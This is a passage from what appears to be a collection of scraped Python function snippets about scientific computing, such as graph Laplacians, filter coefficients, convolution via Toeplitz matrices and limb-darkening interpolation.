one_dim_sparse_laplacian(m: int):\n return sp.diags([1.0, -2.0, 1.0], [-1, 0, 1], dtype='float64', shape=(m, m), format='lil')", "def convex_conj(self):\n return KullbackLeibler(self.domain, self.prior)", "def get_coeffs(b, q0, hL, g):\n\n C0 = q0 * q0 / (2. 
* g)\n C1 = b - C0 / (hL * hL) - hL\n\n return C0, C1", "def pchip_coeffs_1(X, Y):\n\n # Find k = index to first valid data site, and\n # K such that K - 1 = index to last valid data site in contiguous range\n # of valid data after index k.\n k, K = valid_range_1_two(X, Y)\n\n return _pchip_coeffs_1(X, Y, k, K)", "def get_l(GW_glitch,i,j):\n\t\t \n\ttemp = np.einsum('nmk,nmk->k', GW_glitch.r_outer_r[:,:,i,j,:], GW_glitch.Hij[:,:,i,j,:])\n\t\t \n\treturn temp", "def lanczos(dx, width, cutoff, /):\n # Coefficients and initial stuff\n # n = (width/dx)//1 # convert window width from 'time units' to 'steps'\n # n = width//2\n # Convert alpha to wavenumber (new units are 'inverse timesteps')\n alpha = 1.0 / (cutoff / dx)\n n = width\n n = (n - 1) // 2 + 1\n tau = np.arange(1, n + 1) # lag time\n C0 = 2 * alpha # integral of cutoff-response function is alpha*pi/pi\n Ck = np.sin(2 * np.pi * alpha * tau) / (np.pi * tau)\n Cktilde = Ck * np.sin(np.pi * tau / n) / (np.pi * tau / n)\n\n # Return filter\n # Example: n = 9 returns 4 + 4 + 1 points\n order = n * 2 - 1\n print(f'Order-{order} Lanczos window')\n window = np.concatenate((np.flipud(Cktilde), np.array([C0]), Cktilde))\n return window[1:-1], 1", "def laplacian_1d(window_size) -> torch.Tensor:\n\n filter_1d = torch.ones(window_size)\n filter_1d[window_size // 2] = 1 - window_size\n laplacian_1d: torch.Tensor = filter_1d\n return laplacian_1d", "def lowpass1(y, dt, fc=3) :\r\n tau=1/(2*np.pi*fc)\r\n alpha=dt/(tau+dt)\r\n y_filt=np.zeros(y.shape)\r\n y_filt[0]=y[0]\r\n for i in np.arange(1,len(y)):\r\n y_filt[i]=alpha*y[i] + (1-alpha)*y_filt[i-1]\r\n return y_filt", "def coefficients(dataset):\r\n x = [row[0] for row in dataset]\r\n y = [row[1] for row in dataset]\r\n x_mean, y_mean = mean(x), mean(y)\r\n b1 = covariance(x, x_mean, y, y_mean) / variance(x, x_mean)\r\n b0 = y_mean - b1 * x_mean\r\n return [b0, b1]", "def get_coefficients(poles):\n\n poles = np.array(poles)\n s = sp.symbols('s')\n poly = 1\n for s_i in poles:\n poly = (s - s_i) * poly\n poly = poly.expand()\n\n # calculate the coefficient of characteristic polynomial\n n = len(poles)\n p = []\n for i in range(n):\n p.append(poly.subs([(s, 0)]))\n poly = poly - p[i]\n poly = poly / s\n poly = poly.expand()\n\n # convert numbers and complex objects from multiplication to a complex number\n p = [complex(x) for x in p]\n # if imaginary part if greater than the boundary, then set imaginary part null\n boundary = 1e-12\n for idx, val in enumerate(p):\n val = complex(val)\n if abs(val.imag) > boundary:\n msg = \"Imaginary Part of the coefficient p[\" + \\\n str(idx) + \"] is not null (\" + str(val.imag) + \") for a given boundary of \" + \\\n str(boundary)\n warnings.warn(msg)\n p[idx] = val.real\n\n return np.array([p], dtype=float)", "def linconv(nx):", "def normalized_laplacian(degree_vector, weight_matrix, length):\n holders = np.zeros((length, 1))\n holders[:, 0] = 1 / degree_vector\n\n return np.eye(length) - holders * weight_matrix", "def laplacian(W, normalized=True):\n\n # Degree matrix.\n d = W.sum(dim=0)\n\n # Laplacian matrix.\n if not normalized:\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n L = D - W\n else:\n # d += np.spacing(np.array(0, W.dtype))\n d = 1 / torch.sqrt(d)\n D = torch.diags(d.A.squeeze(), 0)\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\n L = I - D * W * D\n\n # assert np.abs(L - L.T).mean() < 1e-9\n assert type(L) is scipy.sparse.csr.csr_matrix\n return L", "def claret_linear(mu, coeff):\n return 1.0 - coeff * (1.0 - mu)", "def coefficients(self):\r\n 
return self.coef_['x']", "def laplacian(W, normalized=False):\r\n # Degree matrix.\r\n d = W.sum(axis=0)\r\n # Laplacian matrix.\r\n if not normalized:\r\n D = scipy.sparse.diags(d.A.squeeze(), 0)\r\n L = D - W\r\n else:\r\n # d += np.spacing(np.array(0, W.dtype))\r\n d = 1 / np.sqrt(d)\r\n D = scipy.sparse.diags(d.A.squeeze(), 0)\r\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\r\n L = I - D * W * D\r\n\r\n # assert np.abs(L - L.T).mean() < 1e-9\r\n assert type(L) is scipy.sparse.csr.csr_matrix\r\n return L", "def LaplacianMatrix(adjmatrix):\n if adjmatrix.dtype in [np.uint, np.uint0, np.uint8, np.uint16, np.uint32, np.uint64]:\n adjmatrix = adjmatrix.astype(int)\n N = len(adjmatrix)\n\n laplacianmatrix = np.identity(N, dtype=adjmatrix.dtype) * adjmatrix.sum(axis=1)\n laplacianmatrix -= adjmatrix\n\n return laplacianmatrix", "def filter_coefficients(position):\n return {\n 0: [0, 0, 0, 64, 0, 0, 0, 0],\n 1: [0, 1, -3, 63, 4, -2, 1, 0],\n 2: [-1, 2, -5, 62, 8, -3, 1, 0],\n 3: [-1, 3, -8, 60, 13, -4, 1, 0],\n 4: [-1, 4, -10, 58, 17, -5, 1, 0],\n 5: [-1, 4, -11, 52, 26, -8, 3, -1],\n 6: [-1, 3, -9, 47, 31, -10, 4, -1],\n 7: [-1, 4, -11, 45, 34, -10, 4, -1],\n 8: [-1, 4, -11, 40, 40, -11, 4, -1],\n 9: [-1, 4, -10, 34, 45, -11, 4, -1],\n 10: [-1, 4, -10, 31, 47, -9, 3, -1],\n 11: [-1, 3, -8, 26, 52, -11, 4, -1],\n 12: [0, 1, -5, 17, 58, -10, 4, -1],\n 13: [0, 1, -4, 13, 60, -8, 3, -1],\n 14: [0, 1, -3, 8, 62, -5, 2, -1],\n 15: [0, 1, -2, 4, 63, -3, 1, 0]\n }.get(position, 'Invalid fractional pixel position!')", "def laplacian_smoothing(texture_data, lap, lap_b, nb_iter, dt):\n mod = 1\n if nb_iter > 10:\n mod = 10\n if nb_iter > 100:\n mod = 100\n if nb_iter > 1000:\n mod = 1000\n # print(tex.shape[0])\n # print(tex.ndim)\n # if tex.ndim < 2:\n # Mtex = tex.reshape(tex.shape[0],1)\n # else:\n # Mtex = tex\n # using Implicit scheme\n # B(X^(n+1)-X^n)/dt+L(X^(n+1))=0\n M = lap_b + dt * lap\n for i in range(nb_iter):\n texture_data = lap_b * texture_data\n if texture_data.ndim > 1:\n for d in range(texture_data.shape[1]):\n texture_data[:, d], infos = lgmres(\n M.tocsr(), texture_data[:, d], tol=solver_tolerance\n )\n else:\n texture_data, infos = lgmres(M.tocsr(), texture_data, tol=solver_tolerance)\n if i % mod == 0:\n print(i)\n\n # using Explicit scheme, convergence guaranteed only for dt<1 and not\n # faster than implicit when using fem Laplacian\n # B(X^(n+1)-X^n)/dt+L(X^n)=0\n # M = B-dt*L\n # for i in range(Niter):\n # Mtex = M * Mtex\n # Mtex, infos = lgmres(B.tocsr(), Mtex, tol=solver_tolerance)\n # if (i % mod == 0):\n # print(i)\n print(\" OK\")\n return texture_data", "def compute_filter_ips_adjacent(lal_filters, spec_corr, psd=None):\n return numpy.array([lalburst.ExcessPowerFilterInnerProduct(f1, f2, spec_corr, psd) for f1, f2 in zip(lal_filters[:-1], lal_filters[1:])])", "def bcL(self, rng=None):\n if rng is None:\n rng = random.PRNGKey(1)\n n = self.n\n x = onp.sin(self.bcmesh * np.pi)\n n_y = (np.floor((n + 1) / 2) - 1).astype(int)\n if rng is not None:\n coeffs = random.multivariate_normal(rng, np.zeros(16),\n np.diag(np.ones(16)))\n else:\n key = random.randint(random.PRNGKey(1), (1,), 1, 1000)\n coeffs = random.multivariate_normal(\n random.PRNGKey(key[0]), np.zeros(16), np.diag(np.ones(16)))\n left = coeffs[0] * x**3 + coeffs[1] * x**2 + coeffs[2] * x #+ coeffs[3]\n right = coeffs[4] * x**3 + coeffs[5] * x**2 + coeffs[6] * x #+ coeffs[7]\n lower = coeffs[8] * x**3 + coeffs[9] * x**2 + coeffs[10] * x #+ coeffs[11]\n upper = coeffs[12] * x**3 + coeffs[13] * x**2 + 
coeffs[14] * x #+ coeffs[15]\n shape = 2 * x.shape\n source = onp.zeros(shape)\n source[0, :] = upper\n source[n_y - 1, n_y - 1:] = lower[:n - n_y + 1]\n source[n_y - 1:, n_y - 1] = right[:n - n_y + 1]\n source[:, 0] = left\n source[-1, :n_y - 1] = right[n:n - n_y:-1]\n source[:n_y - 1, -1] = lower[n:n - n_y:-1]\n # because this makes the correct order of boundary conditions\n return source * (n + 1)**2", "def calculate_coefficients(self):\n for i in range(0, self.nz):\n zno = i * self.dz\n self.z[0][i] = zno\n plot_eccentricity_error = False\n position = -1\n for j in range(0, self.ntheta):\n # fmt: off\n self.gama[i][j] = j * self.dtheta + (np.pi - self.beta)\n [radius_external, self.xre[i][j], self.yre[i][j]] = \\\n self.external_radius_function(self.gama[i][j])\n [radius_internal, self.xri[i][j], self.yri[i][j]] = \\\n self.internal_radius_function(zno, self.gama[i][j])\n self.re[i][j] = radius_external\n self.ri[i][j] = radius_internal\n\n w = self.omega * self.ri[i][j]\n\n k = (self.re[i][j] ** 2 * (np.log(self.re[i][j]) - 1 / 2) - self.ri[i][j] ** 2 *\n (np.log(self.ri[i][j]) - 1 / 2)) / (self.ri[i][j] ** 2 - self.re[i][j] ** 2)\n\n self.c1[i][j] = (1 / (4 * self.viscosity)) * ((self.re[i][j] ** 2 * np.log(self.re[i][j]) -\n self.ri[i][j] ** 2 * np.log(self.ri[i][j]) +\n (self.re[i][j] ** 2 - self.ri[i][j] ** 2) *\n (k - 1)) - 2 * self.re[i][j] ** 2 * (\n (np.log(self.re[i][j]) + k - 1 / 2) * np.log(\n self.re[i][j] / self.ri[i][j])))\n\n self.c2[i][j] = (- self.ri[i][j] ** 2) / (8 * self.viscosity) * \\\n ((self.re[i][j] ** 2 - self.ri[i][j] ** 2 -\n (self.re[i][j] ** 4 - self.ri[i][j] ** 4) /\n (2 * self.ri[i][j] ** 2)) +\n ((self.re[i][j] ** 2 - self.ri[i][j] ** 2) /\n (self.ri[i][j] ** 2 *\n np.log(self.re[i][j] / self.ri[i][j]))) *\n (self.re[i][j] ** 2 * np.log(self.re[i][j] / self.ri[i][j]) -\n (self.re[i][j] ** 2 - self.ri[i][j] ** 2) / 2))\n\n self.c0w[i][j] = (- w * self.ri[i][j] *\n (np.log(self.re[i][j] / self.ri[i][j]) *\n (1 + (self.ri[i][j] ** 2) / (self.re[i][j] ** 2 - self.ri[i][j] ** 2)) - 1 / 2))\n # fmt: on\n if not plot_eccentricity_error:\n if abs(self.xri[i][j]) > abs(self.xre[i][j]) or abs(\n self.yri[i][j]\n ) > abs(self.yre[i][j]):\n plot_eccentricity_error = True\n position = i\n if plot_eccentricity_error:\n self.plot_eccentricity(position)\n sys.exit(\n \"Error: The given parameters create a rotor that is not inside the stator. \"\n \"Check the plotted figure and fix accordingly.\"\n )", "def convolution_as_maultiplication(I, F, print_ir=False):\n # number of columns and rows of the input \n I_row_num, I_col_num = I.shape \n\n # number of columns and rows of the filter\n F_row_num, F_col_num = F.shape\n\n # calculate the output dimensions\n output_row_num = I_row_num + F_row_num - 1\n output_col_num = I_col_num + F_col_num - 1\n if print_ir: print('output dimension:', output_row_num, output_col_num)\n\n # zero pad the filter\n F_zero_padded = np.pad(F, ((output_row_num - F_row_num, 0),\n (0, output_col_num - F_col_num)),\n 'constant', constant_values=0)\n if print_ir: print('F_zero_padded: ', F_zero_padded)\n\n # use each row of the zero-padded F to creat a toeplitz matrix. 
\n # Number of columns in this matrices are same as numbe of columns of input signal\n toeplitz_list = []\n for i in range(F_zero_padded.shape[0]-1, -1, -1): # iterate from last row to the first row\n c = F_zero_padded[i, :] # i th row of the F \n r = np.r_[c[0], np.zeros(I_col_num-1)] # first row for the toeplitz fuction should be defined otherwise\n # the result is wrong\n toeplitz_m = toeplitz(c,r) # this function is in scipy.linalg library\n toeplitz_list.append(toeplitz_m)\n if print_ir: print('F '+ str(i)+'\\n', toeplitz_m)\n\n # doubly blocked toeplitz indices: \n # this matrix defines which toeplitz matrix from toeplitz_list goes to which part of the doubly blocked\n c = range(1, F_zero_padded.shape[0]+1)\n r = np.r_[c[0], np.zeros(I_row_num-1, dtype=int)]\n doubly_indices = toeplitz(c, r)\n if print_ir: print('doubly indices \\n', doubly_indices)\n\n ## creat doubly blocked matrix with zero values\n toeplitz_shape = toeplitz_list[0].shape # shape of one toeplitz matrix\n h = toeplitz_shape[0]*doubly_indices.shape[0]\n w = toeplitz_shape[1]*doubly_indices.shape[1]\n doubly_blocked_shape = [h, w]\n doubly_blocked = np.zeros(doubly_blocked_shape)\n\n # tile toeplitz matrices for each row in the doubly blocked matrix\n b_h, b_w = toeplitz_shape # hight and withs of each block\n for i in range(doubly_indices.shape[0]):\n for j in range(doubly_indices.shape[1]):\n start_i = i * b_h\n start_j = j * b_w\n end_i = start_i + b_h\n end_j = start_j + b_w\n doubly_blocked[start_i: end_i, start_j:end_j] = toeplitz_list[doubly_indices[i,j]-1]\n\n if print_ir: print('doubly_blocked: ', doubly_blocked)\n\n # convert I to a vector\n vectorized_I = matrix_to_vector(I)\n if print_ir: print('vectorized_I: ', vectorized_I)\n \n # get result of the convolution by matrix mupltiplication\n result_vector = np.matmul(doubly_blocked, vectorized_I)\n if print_ir: print('result_vector: ', result_vector)\n\n # reshape the raw rsult to desired matrix form\n out_shape = [output_row_num, output_col_num]\n output = vector_to_matrix(result_vector, out_shape)\n if print_ir: print('Result of implemented method: \\n', output)\n \n return output", "def call(self, inputs, training=None):\n with tf.device(\"/device:GPU:0\"):\n return tf.reshape(tf.einsum('bj,jk,bk->b', inputs, self.laplacian, inputs), (-1, 1))", "def nonlinear(x):\n xo = np.int32(x)\n y = [xo[n] ** 2 + xo[n - 1] * xo[n + 1] for n in range(1, len(x) - 1)]\n window = np.bartlett(12)\n return np.convolve(y, window)", "def dLdp(C1s,C0s,ks,bs,sigma=1):\n # return np.array(jit(jacfwd(L,argnums=1))(q,ps,C1s,C0s,ks,bs,sigma))\n \n # A = FIM(q,ps,C1s,C0s,ks,bs,sigma)\n \n # Construct A(q,ps)\n A = FIM(C1s,C0s,ks,bs,sigma)\n\n # Construct dAdp(q,ps)\n dAdp = jit(jacfwd(A,argnums=1))\n \n # Construct inv_A(q,ps)\n inv_A=lambda q,ps: jnp.linalg.inv(A(q,ps))\n \n # print(np.trace(-dAinv(inv_A,dAdp),axis1=0,axis2=1)-np.array(jit(jacfwd(L,argnums=1))(q,ps,C1s,C0s,ks,bs,sigma)))\n \n # Construct dLdP(q,ps)\n\n\n\n return lambda q,ps: -np.array(jnp.trace(dAinv(inv_A(q,ps),dAdp(q,ps)),axis1=0,axis2=1))", "def Laplace_covariance(self):\n #TODO add in the prior contributions for MAP estimation\n #TODO fix the hessian for tied, constrained and fixed components\n if hasattr(self, 'log_likelihood_hessian'):\n A = -self.log_likelihood_hessian()\n\n else:\n print \"numerically calculating hessian. 
please be patient!\"\n x = self._get_params()\n def f(x):\n self._set_params(x)\n return self.log_likelihood()\n h = ndt.Hessian(f)\n A = -h(x)\n self._set_params(x)\n # check for almost zero components on the diagonal which screw up the cholesky\n aa = np.nonzero((np.diag(A)<1e-6) & (np.diag(A)>0.))[0]\n A[aa,aa] = 0.\n return A", "def lowpass(R1=10e3,R2=10e3,C1=1e-9,C2=1e-9,G=1.586,Vi=1):\n A=Matrix([[0,0,1,-1/G],\n [-1/(1+s*R2*C2),1,0,0],\n [0,-G,G,1],\n [-1/R1-1/R2-s*C1,1/R2,0,s*C1]])\n \n b=Matrix([0,0,0,-Vi/R1])\n \n V=A.inv()*b\n return (A,b,V)", "def get_edges(image):\n if len(image.shape) == 3:\n # has more than one channel\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n kernel = np.ones((5, 5), np.float32)/5\n dst = cv2.filter2D(image, -1, kernel)\n lap = cv2.Laplacian(dst, cv2.CV_64F)\n return lap", "def getldcoeffs(Teff, logg, z, Tefferr, loggerr, zerr, law, channel, quiet = False):\n\n if not quiet: print \"\\nInterpolating {} limb darkening coefficients for {}...\".format(law,channel)\n # Paths where the tables are stored\n ch1path = \"{}/PhD/code/LD3.6Spitzer.txt\".format(os.getenv('HOME'))\n ch2path = \"{}/PhD/code/LD4.5Spitzer.txt\".format(os.getenv('HOME'))\n\n # Read in the required table\n if channel == 'ch1':\n table = np.genfromtxt(ch1path, skip_header=13, dtype=float, encoding = None)\n elif channel == 'ch2':\n table = np.genfromtxt(ch2path, skip_header=13, dtype=float, encoding = None)\n\n # 3D array of discrete values of teff, logg and z\n points = np.array([table.T[0], table.T[1], table.T[2]]).T\n\n if law == \"linear\": index = [0]\n elif law == \"quadratic\": index = [1,2]\n elif law == \"nonlinear\": index = [6,7,8,9]\n else: pass\n\n coeffs = np.zeros(len(index))\n coeffs_err = np.zeros(len(index))\n\n for i in range(len(index)):\n # All possible values of desired limb darkening coefficient (indexed)\n values = table.T[3+index[i]]\n # 3D Interpolates\n interp = LinearNDInterpolator(points,values)\n coeffs[i] = interp.__call__([Teff,logg,z])\n\n # Estimate the error on the interpolated result based on errors Teff,logg,z\n coeffsTU = interp.__call__(np.array([Teff+Tefferr,logg,z]))\n coeffsTL = interp.__call__(np.array([Teff-Tefferr,logg,z]))\n coeffsgU = interp.__call__(np.array([Teff,logg+loggerr,z]))\n coeffsgL = interp.__call__(np.array([Teff,logg-loggerr,z]))\n coeffszU = interp.__call__(np.array([Teff,logg,z+zerr]))\n coeffszL = interp.__call__(np.array([Teff,logg,z-zerr]))\n\n coeffs_err[i] = np.sqrt( ((coeffsTU - coeffsTL)/2.)**2 + ((coeffsgU - coeffsgL)/2.)**2 + ((coeffszU - coeffszL)/2.)**2 )\n\n if not quiet: print \"\\t Coeff(s): {}\".format(coeffs)\n if not quiet: print \"\\t Coeff Err(s): {}\".format(coeffs_err)\n\n return coeffs.tolist(), coeffs_err.tolist()", "def Z_lopass(C, L, R_L, f):\n return 1/(1/Xcap(C,f) + 1/Z_low(L, R_L, f))", "def coeff_b(nrows, ncols) -> np.ndarray:\n coeff_array = np.zeros((nrows, ncols), dtype=\"complex_\")\n for idx, _ in np.ndenumerate(coeff_array):\n coeff_array[idx] = 1j * (idx[0] - idx[1])\n return coeff_array", "def convex_conj(self):\n return KullbackLeiblerCrossEntropy(self.domain, self.prior)", "def _calculate_filter_parameters(self):\n dt = 1.0 / self._fs\n nl_b_wq = 180.0\n nl_b_wp = 0.14\n nlin_bw = nl_b_wp * self._cf + nl_b_wq\n nlin_phi = 2.0 * numpy.pi * nlin_bw * dt\n nlin_theta = 2.0 * numpy.pi * self._cf * dt\n nlin_cos_theta = numpy.cos(nlin_theta)\n nlin_sin_theta = numpy.sin(nlin_theta)\n nlin_alpha = -numpy.exp(-nlin_phi) * nlin_cos_theta\n nlin_a1 = 2.0 * nlin_alpha\n nlin_a2 = 
numpy.exp(-2.0 * nlin_phi)\n nlin_z1 = complex(\n (1.0 + nlin_alpha * nlin_cos_theta), -\n (nlin_alpha * nlin_sin_theta))\n nlin_z2 = complex(\n (1.0 + nlin_a1 * nlin_cos_theta), -\n (nlin_a1 * nlin_sin_theta))\n nlin_z3 = complex(\n (nlin_a2 * numpy.cos(2.0 * nlin_theta)), -\n (nlin_a2 * numpy.sin(2.0 * nlin_theta)))\n nlin_tf = (nlin_z2 + nlin_z3) / nlin_z1\n nlin_b0 = abs(nlin_tf)\n nlin_b1 = nlin_alpha * nlin_b0\n\n lin_b_wq = 235.0\n lin_b_wp = 0.2\n lin_bw = lin_b_wp * self._cf + lin_b_wq\n lin_phi = 2.0 * numpy.pi * lin_bw * dt\n lin_c_fp = 0.62\n lin_c_fq = 266.0\n lin_cf = lin_c_fp * self._cf + lin_c_fq\n lin_theta = 2.0 * numpy.pi * lin_cf * dt\n lin_cos_theta = numpy.cos(lin_theta)\n lin_sin_theta = numpy.sin(lin_theta)\n lin_alpha = -numpy.exp(-lin_phi) * lin_cos_theta\n lin_a1 = 2.0 * lin_alpha\n lin_a2 = numpy.exp(-2.0 * lin_phi)\n lin_z1 = complex(\n (1.0 + lin_alpha * lin_cos_theta), -\n (lin_alpha * lin_sin_theta))\n lin_z2 = complex(\n (1.0 + lin_a1 * lin_cos_theta), -\n (lin_a1 * lin_sin_theta))\n lin_z3 = complex(\n (lin_a2 * numpy.cos(2.0 * lin_theta)), -\n (lin_a2 * numpy.sin(2.0 * lin_theta)))\n lin_tf = (lin_z2 + lin_z3) / lin_z1\n lin_b0 = abs(lin_tf)\n lin_b1 = lin_alpha * lin_b0\n\n return [lin_a1, lin_a2, lin_b0, lin_b1, nlin_a1, nlin_a2, nlin_b0,\n nlin_b1]", "def laplacian(self, array_in):\r\n\r\n # Call-through to Laplacian operator, already computed\r\n return self.laplace_op*array_in", "def poly_from_zeros(z):\n if len(z) == 0:\n return [1]\n p = [1, -z[0]]\n for k in range(1, len(z)):\n p = _convolve(p, [1, -z[k]])\n return p", "def Laplace_covariance(self):\r\n # TODO add in the prior contributions for MAP estimation\r\n # TODO fix the hessian for tied, constrained and fixed components\r\n if hasattr(self, 'log_likelihood_hessian'):\r\n A = -self.log_likelihood_hessian()\r\n\r\n else:\r\n print \"numerically calculating Hessian. please be patient!\"\r\n x = self._get_params()\r\n def f(x):\r\n self._set_params(x)\r\n return self.log_likelihood()\r\n h = ndt.Hessian(f) # @UndefinedVariable\r\n A = -h(x)\r\n self._set_params(x)\r\n # check for almost zero components on the diagonal which screw up the cholesky\r\n aa = np.nonzero((np.diag(A) < 1e-6) & (np.diag(A) > 0.))[0]\r\n A[aa, aa] = 0.\r\n return A", "def lapsharp(image, maskret = False):\n #padded_image = np.pad(img, (1, 1), mode = 'symmetric')\n # lap is linear therefore;\n # lap f(x,y) = f(x + 1, y) + f(x - 1, y) + f(x, y + 1) + f(x, y - 1) - 4f(x,y)...\n #--------------------\n c = -1 # Depends on kernel\n # make zero kernal\n lapmask = np.zeros((3, 3))\n \n # add values to kernel\n lapmask[0,0] = 1\n lapmask[0,1] = 1\n lapmask[0,2] = 1\n\n lapmask[1,0] = 1\n lapmask[1,1] = -8\n lapmask[1,2] = 1\n\n lapmask[2,0] = 1\n lapmask[2,1] = 1\n lapmask[2,2] = 1\n #--------------------\n mask = convolve2d(image, lapmask, mode = 'same')\n result = image + c*mask\n\n # Map values to 0-255\n g1 = image - np.min(image)\n g = g1/np.max(g1) *255\n g = g.astype('uint8')\n\n if maskret == True:\n return g, mask\n else:\n return g.astype('uint8')", "def fLinear(Vc1,Vc2,Vc3,Vk,Vw,Va,Vf,Pc1,Pc2,Pc3,Pk,Pw,Pa,Pf):\n#\n# 1. Normalise volumetric components:\n#\t-----------------------------------\n\tSum=abs(Vc1)+abs(Vc2)+abs(Vc3)+abs(Vk)+abs(Vw)+abs(Va)+abs(Vf)\n\tVc1=abs(Vc1)/Sum\n\tVc2=abs(Vc2)/Sum\n\tVc3=abs(Vc3)/Sum\n\tVk=abs(Vk)/Sum\n\tVw=abs(Vw)/Sum\n\tVa=abs(Va)/Sum\n\tVf=abs(Vf)/Sum\n#\n#\t2. 
Compute liear response function:\n#\t-----------------------------------\n\tLrf=Vc1*Pc1+Vc2*Pc2+Vc3*Pc3+Vk*Pk+Vw*Pw+Va*Pa+Vf*Pf\n#\n# 3. Output result:\n#\t-----------------\n\treturn Lrf", "def LP_filt(filterLength, x):\n b=np.ones(filterLength,)/(filterLength) #Finite Impulse Response (FIR) Moving Average (MA) filter with one second filter length\n a=1\n y = signal.filtfilt(b, a, x)\n return y", "def L1(X):\n \n sanitycheck(X,np.ndarray)\n return np.sqrt(np.power(X, 2)).sum(axis=1)", "def lap_mat(self):", "def cov_l2cov_lmin(C_l) -> np.array:\n def isDiag(M):\n i, j = M.shape\n assert i == j \n test = M.reshape(-1)[:-1].reshape(i-1, j+1)\n return ~np.any(test[:, 1:])\n\n def invdiagmat(C):\n import copy\n ret = copy.deepcopy(C)\n row, col = np.diag_indices(ret.shape[0])\n ret[row, col] = 1/np.diag(ret)\n return ret\n\n elaw = np.ones(C_l.shape[-1])\n if isDiag(C_l):\n inv = invdiagmat(C_l)\n else:\n inv = np.linalg.inv(C_l)\n\n cov_minimal = elaw @ inv @ elaw\n return 1/cov_minimal", "def XtoL(self, x):\n lc = np.zeros(3)\n \n lc[0] = (x[0]-self.x0[0])/self.dh[0];\n lc[1] = (x[1]-self.x0[1])/self.dh[1];\n lc[2] = (x[2]-self.x0[2])/self.dh[2];\n \n return lc", "def filt_lp(sig: np.ndarray, Ss: int, Cfs: int, Cfs1: None,\n order=5) -> np.ndarray:\n nyq = 0.5 * Ss\n normal_cutoff = Cfs / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return lfilter(b, a, sig)", "def coefficients(self):\n if self._coefficients is None:\n return np.hstack([c.coefficients for c in self._traces])\n return self._coefficients", "def poly2lsf(a):\n\n #Line spectral frequencies are not defined for complex polynomials.\n\n # Normalize the polynomial\n\n a = np.array(a)\n if a[0] != 1:\n a/=a[0]\n\n if max(np.abs(np.roots(a))) >= 1.0:\n error('The polynomial must have all roots inside of the unit circle.');\n\n\n # Form the sum and differnce filters\n\n p = len(a)-1 # The leading one in the polynomial is not used\n a1 = np.concatenate((a, np.array([0])))\n a2 = a1[-1::-1]\n P1 = a1 - a2 # Difference filter\n Q1 = a1 + a2 # Sum Filter\n\n # If order is even, remove the known root at z = 1 for P1 and z = -1 for Q1\n # If odd, remove both the roots from P1\n\n if p%2: # Odd order\n P, r = deconvolve(P1,[1, 0 ,-1])\n Q = Q1\n else: # Even order\n P, r = deconvolve(P1, [1, -1])\n Q, r = deconvolve(Q1, [1, 1])\n\n rP = np.roots(P)\n rQ = np.roots(Q)\n\n aP = np.angle(rP[1::2])\n aQ = np.angle(rQ[1::2])\n\n lsf = sorted(np.concatenate((-aP,-aQ)))\n\n return lsf", "def waverec2(coeffs: list, wavelet: pywt.Wavelet) -> torch.Tensor:\n _, _, rec_lo, rec_hi = get_filter_tensors(\n wavelet, flip=False, device=coeffs[0].device,\n dtype=coeffs[0].dtype\n )\n filt_len = rec_lo.shape[-1]\n rec_filt = construct_2d_filt(lo=rec_lo, hi=rec_hi)\n\n res_ll = coeffs[0]\n for c_pos, res_lh_hl_hh in enumerate(coeffs[1:]):\n res_ll = torch.cat(\n [res_ll, res_lh_hl_hh[0], res_lh_hl_hh[1], res_lh_hl_hh[2]], 1\n )\n res_ll = torch.nn.functional.conv_transpose2d(\n res_ll, rec_filt, stride=2)\n\n # remove the padding\n padl = (2 * filt_len - 3) // 2\n padr = (2 * filt_len - 3) // 2\n padt = (2 * filt_len - 3) // 2\n padb = (2 * filt_len - 3) // 2\n if c_pos < len(coeffs) - 2:\n # if 1:\n pred_len = res_ll.shape[-1] - (padl + padr)\n next_len = coeffs[c_pos + 2][0].shape[-1]\n pred_len2 = res_ll.shape[-2] - (padt + padb)\n next_len2 = coeffs[c_pos + 2][0].shape[-2]\n if next_len != pred_len:\n padr += 1\n pred_len = res_ll.shape[-1] - (padl + padr)\n assert (\n next_len == pred_len\n ), \"padding error, please open an issue 
on github \"\n if next_len2 != pred_len2:\n padb += 1\n pred_len2 = res_ll.shape[-2] - (padt + padb)\n assert (\n next_len2 == pred_len2\n ), \"padding error, please open an issue on github \"\n if padt > 0:\n res_ll = res_ll[..., padt:, :]\n if padb > 0:\n res_ll = res_ll[..., :-padb, :]\n if padl > 0:\n res_ll = res_ll[..., padl:]\n if padr > 0:\n res_ll = res_ll[..., :-padr]\n return res_ll", "def coefficients(self) :\n return self.__coefficients", "def imageGradient( iImage ):\n iImage = np.array( iImage, dtype='float' ) \n iSobel = np.array( ((0,0,0),(-1,0,1),(0,0,0)) ) #ni dejansko Sobel, je samo centralna diferenca.\n oGx = ni.convolve( iImage, iSobel, mode='constant' )\n oGy = ni.convolve( iImage, np.transpose( iSobel ), mode='constant' )\n return oGx, oGy", "def langevin_coefficients(\n temperature,\n dt,\n friction,\n masses):\n vscale = np.exp(-dt*friction)\n if friction == 0:\n fscale = dt\n else:\n fscale = (1-vscale)/friction\n kT = BOLTZ * temperature\n nscale = np.sqrt(kT*(1-vscale*vscale)) # noise scale\n invMasses = 1.0/masses\n sqrtInvMasses = np.sqrt(invMasses)\n\n ca = vscale\n cb = fscale*invMasses\n cc = nscale*sqrtInvMasses\n return ca, cb, cc", "def derive_cardelli(wavelength, Rv):\n x = 1.0 / np.array(wavelength)\n\n # check for applicability\n if (np.min(x) < 0.3):\n print( 'wavelength is longer than applicable range for Cardelli law')\n return None\n\n if (np.max(x) > 8.0):\n print( 'wavelength is shorter than applicable range for Cardelli law')\n return None\n \n # Set up some arrays for coefficients that we will need\n a = np.zeros(len(x), dtype=float)\n b = np.zeros(len(x), dtype=float)\n\n y = x - 1.82\n\n # Calculate coefficients for long wavelengths (low wavenumber)\n # Wavenumger <= 1.1 (Eq. 2a, 2b)\n idx = np.where(x <= 1.1)[0]\n a[idx] = 0.574 * x[idx] ** 1.61\n b[idx] = -0.527 * x[idx] ** 1.61\n\n # Calculate coefficients for intermediate wavelengths\n # 1.1 < wavenumber <= 3.3 (Eq. 3a, 3b)\n idx = np.where((x > 1.1) & (x <= 3.3))[0]\n yy = y[idx]\n a[idx] = 1 + (0.17699 * yy) - (0.50447 * yy ** 2) - \\\n (0.02427 * yy ** 3) + (0.72085 * yy ** 4) + \\\n (0.01979 * yy ** 5) - (0.77530 * yy ** 6) + \\\n (0.32999 * yy ** 7)\n b[idx] = (1.41338 * yy) + (2.28305 * yy ** 2) + \\\n 